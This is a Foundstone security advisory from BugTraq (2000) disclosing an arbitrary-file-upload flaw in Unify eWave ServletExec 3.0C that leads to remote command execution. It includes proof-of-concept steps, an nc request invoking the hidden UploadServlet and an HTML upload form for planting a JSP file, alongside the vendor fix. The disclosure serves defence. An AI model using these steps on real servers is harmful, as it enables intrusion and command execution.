![[LWN Logo]](/images/lcorner.png) |
|
![[Timeline]](/images/Included.png) |
Date: Tue, 31 Oct 2000 20:38:58 -0800
From: Foundstone Labs <labs@FOUNDSTONE.COM>
Subject: Unify eWave ServletExec upload
To: BUGTRAQ@SECURITYFOCUS.COM
Foundstone, Inc.
http://www.foundstone.com
"Securing the Dot Com World"
Security Advisory
Unify eWave ServletExec upload
----------------------------------------------------------------------
FS Advisory ID: FS-103100-16-SRVX
Release Date: October 31, 2000
Product: Unify eWave ServletExec 3.0C
Vendor: Unify Corp.
(http://www.unifyewave.com/servletexec/)
Type: Uploading arbitrary files leading to remote
command execution.
Severity: High
Author: Shreeraj Shah (shreeraj.shah@foundstone.com)
Saumil Shah (saumil.shah@foundstone.com)
Stuart McClure (stuart.mcclure@foundstone.com)
Foundstone, Inc. (http://www.foundstone.com)
Operating Systems: All operating systems supported by ServletExec
Vulnerable versions: Unify eWave ServletExec 3.0C
Foundstone Advisory: http://www.foundstone.com/advisories.htm
----------------------------------------------------------------------
Description
Unify's eWave ServletExec is a JSP and a Java Servlet engine
which is used as a plug-in to popular web servers like
Apache, IIS, Netscape, etc.
ServletExec has a servlet called "UploadServlet" in its server
side classes. UploadServlet, when invokable, allows an
attacker to upload any file to any directory on the server. The
uploaded file may have code that can later be executed on the
server, leading to remote command execution.
Details
ServletExec has com.unify.ewave.servletexec.UploadServlet residing
in its server side classes. Even though this servlet is not
registered, it can be invoked on the server side by the following
HTTP requests:
nc 10.0.0.1 80
GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0
-or-
http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet
An attacker can create an HTML form on his or her local system
to use this servlet to upload arbitrary files on to the server.
A sample of such a form is given below:
<FORM METHOD=POST ENCTYPE='multipart/form-data'
ACTION='http://10.0.0.1/servlet/com.unify.ewave.servletexec.UploadServlet'>
<P>
Upload Directory:
<INPUT TYPE=TEXT SIZE=35 Name=uploadDir>
<P>
File to Upload:
<INPUT TYPE=FILE SIZE=35 NAME=File1>
<P>
<INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files">
</FORM>
Using this upload form, an attacker can upload a file, for
example a JSP file, that can run arbitrary commands on the
server side.
Solution
Upgrade to ServletExec version 3.0E, available at:
http://www.servletexec.com/downloads/
Please contact the vendor for further details at
info@unify.com or Unify Sales at 1-800-248-6439
Credits
We would like to thank Unify for their prompt reaction to this
problem and their co-operation in heightening awareness in the
security community.
Disclaimer
The information contained in this advisory is the copyright (C)
2000 of Foundstone, Inc. and believed to be accurate at the time
of printing, but no representation or warranty is given, express
or implied, as to its accuracy or completeness. Neither the
author nor the publisher accepts any liability whatsoever for
any direct, indirect or conquential loss or damage arising in
any way from any use of, or reliance placed on, this information
for any purpose. This advisory may be redistributed provided that
no fee is assigned and that the advisory is not modified in any
way.